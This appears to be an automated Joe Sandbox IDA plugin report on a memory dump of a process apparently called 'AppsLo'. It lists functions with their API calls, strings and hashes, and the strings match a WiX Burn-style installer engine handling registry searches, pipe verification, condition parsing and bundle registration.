Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
API String ID: 2944378912-2047837012
Opcode ID: 4811b2c16a5efe90080966e5059862d5fc48e10a7ad6a6cdbf34d12cdbb93e31
Instruction ID: 955ac2914b9aea8f5bf0bda71248de2bcf3c697bbe96d2b21396deb930dd2164
Opcode Fuzzy Hash: 4811b2c16a5efe90080966e5059862d5fc48e10a7ad6a6cdbf34d12cdbb93e31
Instruction Fuzzy Hash: 8771D676E4163AABDB2096A48C45BEF77A8FF14B21F120121BE11FB380DB64DD4086E5

Function 008AA416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008AA45A
_MREFOpen@16.MSPDB140-MSVCRT ref: 008AA480
RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 008AA768

Strings

Failed to format key string., xrefs: 008AA465
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 008AA51C
Failed to format value string., xrefs: 008AA48B
Failed to clear variable., xrefs: 008AA4D8
Failed to query registry key value size., xrefs: 008AA554
Failed to read registry value., xrefs: 008AA6F6
Failed to get expand environment string., xrefs: 008AA6DD
Failed to allocate string buffer., xrefs: 008AA667
Failed to open registry key., xrefs: 008AA4ED
search.cpp, xrefs: 008AA54A, 008AA57D, 008AA5D0, 008AA6D3
Failed to allocate memory registry value., xrefs: 008AA587
Failed to query registry key value., xrefs: 008AA5DA
Failed to change value type., xrefs: 008AA70F
Registry key not found. Key = '%ls', xrefs: 008AA4B4
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 008AA740
Unsupported registry key value type. Type = '%u', xrefs: 008AA608
Failed to set variable., xrefs: 008AA72B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-3124384294
Opcode ID: ede8cedca603e34d6a0a56b8ff329a149df40707a09c04fde2b307d2a291b237
Instruction ID: 4ada7ca927b675af26c3469b96b5df04bb761f4f62bf23d822a8583fda4845f8
Opcode Fuzzy Hash: ede8cedca603e34d6a0a56b8ff329a149df40707a09c04fde2b307d2a291b237
Instruction Fuzzy Hash: ABA1D672D0012ABBEF269AE4CC45AAE7A74FF06710F158121F910F6A50D775DD40DAA2

Function 008A5770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,008AA8B4,00000100,000002C0,000002C0,00000100), ref: 008A5795
lstrlenW.KERNEL32(000002C0,?,008AA8B4,00000100,000002C0,000002C0,00000100), ref: 008A579F
_wcschr.LIBVCRUNTIME ref: 008A59A7
LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,008AA8B4,00000100,000002C0,000002C0,00000100), ref: 008A5C4A

Strings

Failed to reallocate variable array., xrefs: 008A5A2C
Failed to allocate record., xrefs: 008A5A0B
variable.cpp, xrefs: 008A59FE, 008A5A1F, 008A5A78, 008A5ACA, 008A5B56, 008A5B88, 008A5C04
Failed to format record., xrefs: 008A5C0E
*****, xrefs: 008A5913
Failed to allocate variable array., xrefs: 008A5A85
Failed to format placeholder string., xrefs: 008A5A57
Failed to get formatted length., xrefs: 008A5B92
Failed to set variable value., xrefs: 008A5A61
Failed to set record format string., xrefs: 008A5AD4
Failed to append placeholder., xrefs: 008A5A4D
[%d], xrefs: 008A5962
Failed to copy string., xrefs: 008A5C2E
Failed to set record string., xrefs: 008A5B60
Failed to allocate buffer for format string., xrefs: 008A57BD
Failed to determine variable visibility: '%ls'., xrefs: 008A5A3A
Failed to append string., xrefs: 008A581B
Failed to allocate string., xrefs: 008A5BC1
Failed to get variable name., xrefs: 008A5A8C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: 7a8da57fcd9d915e5849c7411e5a7a81fba3bb986e49254c784d05edd1b76f73
Instruction ID: 18cc4e9b74e93ceedb1e6cc0958dd46eb05c9a8ca16e987bad48a68bbcb3ed00
Opcode Fuzzy Hash: 7a8da57fcd9d915e5849c7411e5a7a81fba3bb986e49254c784d05edd1b76f73
Instruction Fuzzy Hash: 0DF1A571D00769EEEB109FA58841EAF7BB4FB06B20F154129FD15EB640D7389E81CBA1

Function 008CCE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,008CD558,?,?,?), ref: 008CCEC7
GetLastError.KERNEL32(?,?,008CD558,?,?,?), ref: 008CCED4
ReleaseMutex.KERNEL32(?), ref: 008CD13C

Strings

Failed to allocate memory for NetFxChainer struct., xrefs: 008CCEAD
Failed to MapViewOfFile for %ls., xrefs: 008CD070
Failed to create event: %ls, xrefs: 008CCF67
Failed to create mutex: %ls, xrefs: 008CCFD6
failed to allocate memory for event name, xrefs: 008CCF1A
NetFxChainer.cpp, xrefs: 008CCEA3, 008CCEF5, 008CCF5A, 008CCFC9, 008CD01B, 008CD063
failed to allocate memory for mutex name, xrefs: 008CCF89
Failed to memory map cabinet file: %ls, xrefs: 008CD028
failed to copy event name to shared memory structure., xrefs: 008CD09A
%ls_send, xrefs: 008CCF06
%ls_mutex, xrefs: 008CCF75

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: 03bcef7b254157e80cd2a082f3a4ea3577bbca8bc80b2135e176b2b510f715dc
Instruction ID: a75a37d28cd3da09a85fdb3aace6d9e6df829b7090c1d096df678941105c8121
Opcode Fuzzy Hash: 03bcef7b254157e80cd2a082f3a4ea3577bbca8bc80b2135e176b2b510f715dc
Instruction Fuzzy Hash: C5812476A41722FFD7219B698C49F5ABAB4FF05720F014129FE08EB291E770DC008AE5

Function 008AEA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 008E32F3: VariantInit.OLEAUT32(?), ref: 008E3309
Part of subcall function 008E32F3: SysAllocString.OLEAUT32(?), ref: 008E3325
Part of subcall function 008E32F3: VariantClear.OLEAUT32(?), ref: 008E33AC
Part of subcall function 008E32F3: SysFreeString.OLEAUT32(00000000), ref: 008E33B7

CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,008ECA9C,?,?,Action,?,?,?,00000000,008A5445), ref: 008AEB13
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 008AEB5D

Strings

Failed to get @Id., xrefs: 008AEC62
Failed to resize Addon code array in registration, xrefs: 008AEC3C
Patch, xrefs: 008AEBDD
Failed to resize Patch code array in registration, xrefs: 008AEC43
Failed to get RelatedBundle element count., xrefs: 008AEA97
Failed to resize Detect code array in registration, xrefs: 008AEC2E
Action, xrefs: 008AEAD0
Invalid value for @Action: %ls, xrefs: 008AEC52
comres.dll, xrefs: 008AEB26
Addon, xrefs: 008AEB9A
Failed to get RelatedBundle nodes, xrefs: 008AEA72
version.dll, xrefs: 008AEB70
Failed to get @Action., xrefs: 008AEC69
Detect, xrefs: 008AEB04
cabinet.dll, xrefs: 008AEBBA
Failed to get next RelatedBundle element., xrefs: 008AEC70
Upgrade, xrefs: 008AEB50
RelatedBundle, xrefs: 008AEA50
Failed to resize Upgrade code array in registration, xrefs: 008AEC35

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$CompareVariant$AllocClearFreeInit
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
API String ID: 702752599-259800149
Opcode ID: 4e25178540f2e15b7b8699271a625617ae4b7ec940784985fe0c53c5dedcbb39
Instruction ID: 345b4ca3ab4ee7870bba71adc7b2fe4c613aafe10602a1baed3a731a52c52aca
Opcode Fuzzy Hash: 4e25178540f2e15b7b8699271a625617ae4b7ec940784985fe0c53c5dedcbb39
Instruction Fuzzy Hash: EB71B13190462AFBEB10DB64C985EAEB7B4FF06724F204654F921E7AC1D774AE11CB90

Function 008B46DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,008B4BF5,008EB4E8,?,feclient.dll,00000000,?,?), ref: 008B46F3
ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,008B4BF5,008EB4E8,?,feclient.dll,00000000,?,?), ref: 008B4714
GetLastError.KERNEL32(?,008B4BF5,008EB4E8,?,feclient.dll,00000000,?,?), ref: 008B471A
ReadFile.KERNEL32(feclient.dll,00000000,008EB518,?,00000000,00000000,008EB519,?,008B4BF5,008EB4E8,?,feclient.dll,00000000,?,?), ref: 008B47A8
GetLastError.KERNEL32(?,008B4BF5,008EB4E8,?,feclient.dll,00000000,?,?), ref: 008B47AE

Strings

Failed to read size of verification secret from parent pipe., xrefs: 008B4748
Verification secret from parent is too big., xrefs: 008B4775
Failed to read verification secret from parent pipe., xrefs: 008B47DC
Failed to allocate buffer for verification secret., xrefs: 008B4791
Verification secret from parent does not match., xrefs: 008B4816
msasn1.dll, xrefs: 008B482B
feclient.dll, xrefs: 008B46E2, 008B4712, 008B4713, 008B47A7, 008B482C, 008B4882
Verification process id from parent does not match., xrefs: 008B48FD
pipe.cpp, xrefs: 008B473E, 008B4769, 008B47D2, 008B480A, 008B4857, 008B48B1, 008B48F1
Failed to read verification process id from parent pipe., xrefs: 008B4861
Failed to inform parent process that child is running., xrefs: 008B48BB

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastRead$CurrentProcess
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
API String ID: 1233551569-452622383
Opcode ID: 5d141e14dc6efd3d857c9ca2112d72e2618804cadb7a441e4f8cf45496d66f4d
Instruction ID: 04b25edb2ccdde490822a79dd5fcf11dbcd3dbdb19af1ba5f32f2d23fa1b8669
Opcode Fuzzy Hash: 5d141e14dc6efd3d857c9ca2112d72e2618804cadb7a441e4f8cf45496d66f4d
Instruction Fuzzy Hash: FE51B536E4026AB7DB219A954C47FBF7A68FB01B20F111175BE20FB391D7749D4086E1

Function 008C27FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to get @DetectCondition., xrefs: 008C2825
RepairArguments, xrefs: 008C287A
Repairable, xrefs: 008C289C
InstallArguments, xrefs: 008C2836
Failed to get @InstallArguments., xrefs: 008C2847
Failed to parse exit codes., xrefs: 008C290C
UninstallArguments, xrefs: 008C2858
Failed to get @Repairable., xrefs: 008C28B5
Failed to get @RepairArguments., xrefs: 008C288B
Failed to get @Protocol., xrefs: 008C2974
none, xrefs: 008C2936
netfx4, xrefs: 008C2915
Failed to get @UninstallArguments., xrefs: 008C2869
Failed to parse command lines., xrefs: 008C2988
Protocol, xrefs: 008C28C3
burn, xrefs: 008C28E0
DetectCondition, xrefs: 008C2814
Invalid protocol type: %ls, xrefs: 008C295C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
API String ID: 760788290-1911311241
Opcode ID: 0dd5dabeb8255f881a0dcd3f3cf168c3735aabb19f8f3bbb49669e7ed7a00ab0
Instruction ID: f380f043edc9be746894d1f1f77aa15a891ecfa916cabddcb44107ca7befb2b8
Opcode Fuzzy Hash: 0dd5dabeb8255f881a0dcd3f3cf168c3735aabb19f8f3bbb49669e7ed7a00ab0
Instruction Fuzzy Hash: A041EA71A4876BB6CA2155748C46F7AB678FB11B30F200329FA34F63C1DB78DD049291

Function 008A8F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,56008EDB,00000001,?,008A9946,?,00000000,00000000,?,?,008A992E,?,?,00000000,?), ref: 008A8FB2

Strings

Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 008A9162
Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 008A93C4
Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 008A9380
Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 008A9242
condition.cpp, xrefs: 008A9084, 008A914E, 008A91CA, 008A922E, 008A936C, 008A93B0, 008A93F4
NOT, xrefs: 008A92DB
-, xrefs: 008A9118
Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 008A91DE
AND, xrefs: 008A92BC
Failed to set symbol value., xrefs: 008A9060
Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 008A9408
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 008A9098

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: StringType
String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-3594736606
Opcode ID: 7c77991cc472b945838f7f704fdd920f650ce007359f88731b7e6f02c3a56328
Instruction ID: d922730d8af94d7dbf3c0fb13b4d1fdbbd7d62479539be8266eeae0c2fa53b83
Opcode Fuzzy Hash: 7c77991cc472b945838f7f704fdd920f650ce007359f88731b7e6f02c3a56328
Instruction Fuzzy Hash: E8F1E371608705FFFB14CF58C889BAA7BA4FB0A704F104545F995DEA84C3B9DA91CB84

Function 008C1BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 008C1CB8
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 008C1CD6

Strings

Invalid exit code type: %ls, xrefs: 008C1DA7
Failed to get @Code., xrefs: 008C1D98
Failed to parse @Code value: %ls, xrefs: 008C1D91
Type, xrefs: 008C1C90
success, xrefs: 008C1CA9
scheduleReboot, xrefs: 008C1CE5
Code, xrefs: 008C1D25
exeuser.cpp, xrefs: 008C1C39
Failed to get exit code node count., xrefs: 008C1C03
Failed to allocate memory for exit code structs., xrefs: 008C1C43
ExitCode, xrefs: 008C1BBF
Failed to get next node., xrefs: 008C1DBE
forceReboot, xrefs: 008C1D03
Failed to get @Type., xrefs: 008C1DB7
Failed to select exit code nodes., xrefs: 008C1BDE
error, xrefs: 008C1CC9

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeuser.cpp$forceReboot$scheduleReboot$success
API String ID: 2664528157-1714101571
Opcode ID: 7f6b18863346b5cbb205708ce70109e32e9ee678089fc0cc7db266b08de05bfb
Instruction ID: 815509ea83ca1214ede27c8180058ff6edc766074e8dd5a5554ed833761908c9
Opcode Fuzzy Hash: 7f6b18863346b5cbb205708ce70109e32e9ee678089fc0cc7db266b08de05bfb
Instruction Fuzzy Hash: B461A43190421AABCF109B95CC89F6E7BB5FF46720F204659F621EB292DB74DE40C751

Function 008E77F7 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 008E7857
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 008E787C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 008E789C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008E78CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 008E78EB
SysFreeString.OLEAUT32(00000000), ref: 008E7916
SysFreeString.OLEAUT32(00000000), ref: 008E798D
SysFreeString.OLEAUT32(00000000), ref: 008E79D9

Strings

rel, xrefs: 008E784A
version.dll, xrefs: 008E78FA
type, xrefs: 008E78DD
href, xrefs: 008E786E
length, xrefs: 008E788E
msasn1.dll, xrefs: 008E79C7
feclient.dll, xrefs: 008E7889
msi.dll, xrefs: 008E7975
comres.dll, xrefs: 008E78A6
title, xrefs: 008E78C1
`Dv, xrefs: 008E7916, 008E798D, 008E79D9

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$Compare$Free
String ID: `Dv$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
API String ID: 318886736-1313079583
Opcode ID: 14b7f8164c42b16187b70f0286da8127a7c4963ab623e1c06bc7f4a35caa0b9a
Instruction ID: f7ffc8417e1ae976b07389fd21dc65b2cb02718cbeda926373d3ff2ea4f5a875
Opcode Fuzzy Hash: 14b7f8164c42b16187b70f0286da8127a7c4963ab623e1c06bc7f4a35caa0b9a
Instruction Fuzzy Hash: 49614E71908269BBDB15DB95CC45FAEBBB9FF06320F2002A5E521E7191D734AE10DB90

Function 008B6BCA Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 351synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 008AD4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,008B7040,000000B8,00000000,?,00000000,7694B390), ref: 008AD4B7
Part of subcall function 008AD4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 008AD4C6
Part of subcall function 008AD4A8: LeaveCriticalSection.KERNEL32(000000D0,?,008B7040,000000B8,00000000,?,00000000,7694B390), ref: 008AD4DB

CreateThread.KERNEL32(00000000,00000000,008B57BD,?,00000000,00000000), ref: 008B6E34
GetLastError.KERNEL32(?,?,?,?,?,?,?,008A4522,?,008EB500,?,008A4846,?,?), ref: 008B6E43
CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008A4522,?,008EB500,?,008A4846,?,?), ref: 008B6EA0
ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 008B6F92
CloseHandle.KERNEL32(00000000), ref: 008B6F9B
CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 008B6FB5

Part of subcall function 008CBD05: SetThreadExecutionState.KERNEL32(80000001), ref: 008CBD0A

Strings

Failed to create cache thread., xrefs: 008B6E71
UX aborted apply begin., xrefs: 008B6C94
Failed to cache user to working directory., xrefs: 008B6D71
Failed to register bundle., xrefs: 008B6DEE
Failed to set initial apply variables., xrefs: 008B6D02
Another per-machine setup is already executing., xrefs: 008B6DC8
Failed to elevate., xrefs: 008B6D94
core.cpp, xrefs: 008B6C8A, 008B6E67
Failed while caching, aborting execution., xrefs: 008B6E98
user cannot start apply because it is busy with another action., xrefs: 008B6C28
crypt32.dll, xrefs: 008B6ECD, 008B6EE7, 008B6FB4
Another per-user setup is already executing., xrefs: 008B6CD8

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$user cannot start apply because it is busy with another action.$Failed to cache user to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
API String ID: 2169948125-4292671789
Opcode ID: 70a26b0454369493cc914731368373bdd2b14084884a76ceb1ba6e1e38ac8fff
